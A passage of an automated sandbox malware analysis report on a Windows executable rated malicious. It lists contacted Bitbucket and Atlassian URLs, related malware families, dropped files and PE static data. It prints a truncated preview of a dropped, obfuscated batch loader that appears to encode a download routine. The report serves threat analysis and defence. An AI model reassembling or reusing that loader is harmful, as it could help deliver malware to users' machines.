                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpacppowershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://oneget.orgXpowershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://id.atlassian.com/profile/rest/profile&quot;powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://aui-cdn.atlassian.com/powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://bitbucket.org/gateway/api/emoji/powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://bqlf8qjztdtr.statuspage.iopowershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1303662906.0000017DBCDD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.00000271315F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://bitbucket.orgpowershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmptrue
                                                    		unknown
                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/adpowershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/logos/bipowershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1290480289.00000271417A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027133078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://id.atlassian.com/loginpowershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1273855820.0000027132F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://bitbucket.org/blog/wp-json/wp/v2/posts?categories=196&context=embed&per_page=6&orderby=date&powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1273855820.0000027132F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://go.micropowershell.exe, 00000005.00000002.1273855820.0000027132225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://id.atlassian.com/logoutpowershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://bitbucket.orgpowershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/jsi18n/en/djpowershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1273855820.0000027132F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://id.atlassian.com/manage-profile/powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fhgdfhdfgd%2Ftpowershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://cdn.cookielaw.org/powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/default_powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://aka.ms/pscore68powershell.exe, 00000004.00000002.1303662906.0000017DBCD5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1303662906.0000017DBCDAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.00000271315F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://oneget.orgpowershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          185.166.143.50
                                                                                          		bitbucket.orgGermany
                                                                                          		16509AMAZON-02UStrue

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1524410
                                                                                          Start date and time:2024-10-02 19:01:48 +02:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 4m 38s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:18
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:nTHivMbGpg.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:e60cc4cdd031cca383ae7d7449eda37dd72d4ef864816d452a7df72a9d019337.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.spre.evad.winEXE@9/6@1/1
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 33.3%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 29
                                                                                          • Number of non-executed functions: 36
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 2412 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3724 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • VT rate limit hit for: nTHivMbGpg.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          13:02:40API Interceptor29x Sleep call for process: powershell.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          185.166.143.50http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                            sostener.vbsGet hashmaliciousNjratBrowse
                                                                                              S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                                                                SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                                  file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                    HelperLibrary.ps1Get hashmaliciousUnknownBrowse
                                                                                                      SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                                                        RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                          Ad#U043ebe_Activator.exeGet hashmaliciousLummaCBrowse
                                                                                                            Notificacon Documneto.vbsGet hashmaliciousUnknownBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              bitbucket.orgsRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                                                                                                              • 185.166.143.49
                                                                                                              envifa.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • 185.166.143.48
                                                                                                              sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                              • 185.166.143.50
                                                                                                              S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                                                                              • 185.166.143.50
                                                                                                              SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                                              • 185.166.143.48
                                                                                                              SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                                              • 185.166.143.50
                                                                                                              file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                              • 185.166.143.50
                                                                                                              https://www.getcoloringpages.com/coloring/359Get hashmaliciousUnknownBrowse
                                                                                                              • 185.166.143.48
                                                                                                              HelperLibrary.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 185.166.143.50
                                                                                                              SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                                                              • 185.166.143.50

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              AMAZON-02USmain_ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 34.249.145.219
                                                                                                              yakov.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 18.191.162.167
                                                                                                              yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 108.128.211.34
                                                                                                              novo.arm5.elfGet hashmaliciousMoobotBrowse
                                                                                                              • 54.171.230.55
                                                                                                              novo.arm64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 54.218.85.75
                                                                                                              novo.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 108.156.207.191
                                                                                                              novo.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 54.124.163.228
                                                                                                              novo.ppc440fp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 54.184.182.174
                                                                                                              novo.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 13.242.57.236
                                                                                                              novo.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              • 34.216.203.110

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 185.166.143.50
                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                              • 185.166.143.50
                                                                                                              PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                              • 185.166.143.50
                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                              • 185.166.143.50
                                                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 185.166.143.50
                                                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 185.166.143.50
                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                              • 185.166.143.50
                                                                                                              inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 185.166.143.50
                                                                                                              doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 185.166.143.50
                                                                                                              All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 185.166.143.50

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):0.773832331134527
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:NlllulM/l:NllUE
                                                                                                              MD5:805C8FFF87C479813887899456C786A0
                                                                                                              SHA1:AEAC181AD6F9ABD8F565AFEEDF2F88D9863EE26E
                                                                                                              SHA-256:978C1203394A1C538B848F3599CE68FC0347FD3471CFDC729D42E74E2EA90F3F
                                                                                                              SHA-512:CDC6EA80327D036E56B3ACE44729334322F8B525A8765B6598802298AEBC945BA1D867F7DA168EC5B0D3C35F7AACD96B62549E667780814A3C9069E53D74DC88
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:@...e.................................|.n.......................

                                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\124.bat

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\nTHivMbGpg.exe
                                                                                                              File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (720), with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):12967
                                                                                                              Entropy (8bit):5.5888603662154415
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:D+KQ7X37nOHi+Gdv8ha/Z+qxnsmlNDz5Iy3dJE/4kS9ivGpI+7f8n:D+Zz37nf+GdvGa/ZImlNDzWyY/QIaEn
                                                                                                              MD5:AD09A81FEE793CFF35B99C9512BE34C2
                                                                                                              SHA1:08F34987BDED74057E939D96F2F64BBBD1EC61F0
                                                                                                              SHA-256:618E7CC67994244C2AB0A8480B59066631AD0C8CD07764B5B6D4F79B2358325F
                                                                                                              SHA-512:A41741C1BDEA39F05C5BB8DAE3B55ECDC94F5D8F7E1348485E080410AB02571384049C63FF8F17354803606B4F0AA88A7EBA7CF8B1590E3203E3BC82BD3A815C
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:@echo off..GOTO ............:............SET ..........=#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#b..GOTO ............:............SET ..........=G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#..GOTO ..........2..:............SET ..........=#F0#XQ#g#Cg#JwB0#Hg#d##u#H##bgBn#FM#bwBl#G0#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#..GOTO ............:............SET ..........=HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##..GOTO ............:..........0..SET ..........=+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE..GOTO ..........1..:............SE

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0v4gvuu.crw.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brg1lxea.r1u.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jarhvwm1.yb2.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zg4arvxn.3qi.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Entropy (8bit):6.175225207813698
                                                                                                              TrID:
                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:nTHivMbGpg.exe
                                                                                                              File size:192'512 bytes
                                                                                                              MD5:8d797e4c1866e6542705a564b7fda527
                                                                                                              SHA1:207db5ae1e14888dc1b2d552ba49d45b7cc3b48f
                                                                                                              SHA256:e60cc4cdd031cca383ae7d7449eda37dd72d4ef864816d452a7df72a9d019337
                                                                                                              SHA512:28c2a92f469cd5d6d7ab4b7d14ce7efebaa89e644c0eb387ad09b5ce87b0f3e286d274dc0197dc6e041c5c79e55b009d2323d87652433e6b6f79f08a41d9b7a6
                                                                                                              SSDEEP:3072:WHwrxmMpvDITZg1SX5vWp1icKAArDZz4N9GhbkENEkdByr:5rMZgp0yN90vEAB6
                                                                                                              TLSH:80148D0A63E420A6E4B5537859F2C2775A317CB25B7496BF12C4ED7F3E23680A532B07
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Kr..%!..%!..%!&. ..%!&.& ..%!&.! ..%!&.$ ..%!..$!b.%!&.- ..%!&..!..%!&.' ..%!Rich..%!................PE..d....y............"

                                                                                                              File Icon

                                                                                                              Icon Hash:823092d2ec684430

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x140008460
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x140000000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:10
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:10
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:10
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              dec eax
                                                                                                              sub esp, 28h
                                                                                                              call 00007F652103FDD0h
                                                                                                              dec eax
                                                                                                              add esp, 28h
                                                                                                              jmp 00007F652103F64Bh
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              dec eax
                                                                                                              mov dword ptr [esp+08h], ebx
                                                                                                              dec eax
                                                                                                              mov dword ptr [esp+10h], edi
                                                                                                              inc ecx
                                                                                                              push esi
                                                                                                              dec eax
                                                                                                              sub esp, 000000B0h
                                                                                                              and dword ptr [esp+20h], 00000000h
                                                                                                              dec eax
                                                                                                              lea ecx, dword ptr [esp+40h]
                                                                                                              call dword ptr [00000F8Dh]
                                                                                                              nop
                                                                                                              dec eax
                                                                                                              mov eax, dword ptr [00000030h]
                                                                                                              dec eax
                                                                                                              mov ebx, dword ptr [eax+08h]
                                                                                                              xor edi, edi
                                                                                                              xor eax, eax
                                                                                                              dec eax
                                                                                                              cmpxchg dword ptr [000046C2h], ebx
                                                                                                              je 00007F652103F64Ch
                                                                                                              dec eax
                                                                                                              cmp eax, ebx
                                                                                                              jne 00007F652103F65Fh
                                                                                                              mov edi, 00000001h
                                                                                                              mov eax, dword ptr [000046B8h]
                                                                                                              cmp eax, 01h
                                                                                                              jne 00007F652103F65Ch
                                                                                                              lea ecx, dword ptr [eax+1Eh]
                                                                                                              call 00007F652103FC63h
                                                                                                              jmp 00007F652103F6C9h
                                                                                                              mov ecx, 000003E8h
                                                                                                              call dword ptr [00000F3Bh]
                                                                                                              jmp 00007F652103F606h
                                                                                                              mov eax, dword ptr [00004693h]
                                                                                                              test eax, eax
                                                                                                              jne 00007F652103F6A5h
                                                                                                              mov dword ptr [00004685h], 00000001h
                                                                                                              dec esp
                                                                                                              lea esi, dword ptr [000011BEh]
                                                                                                              dec eax
                                                                                                              lea ebx, dword ptr [0000119Fh]
                                                                                                              dec eax
                                                                                                              mov dword ptr [esp+30h], ebx
                                                                                                              mov dword ptr [esp+24h], eax
                                                                                                              dec ecx
                                                                                                              cmp ebx, esi
                                                                                                              jnc 00007F652103F671h
                                                                                                              test eax, eax
                                                                                                              jne 00007F652103F671h
                                                                                                              dec eax
                                                                                                              cmp dword ptr [ebx], 00000000h
                                                                                                              je 00007F652103F65Ch
                                                                                                              dec ecx
                                                                                                              mov edx, 5E523070h

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa2b40xb4.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1ff56.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x42c.pdata
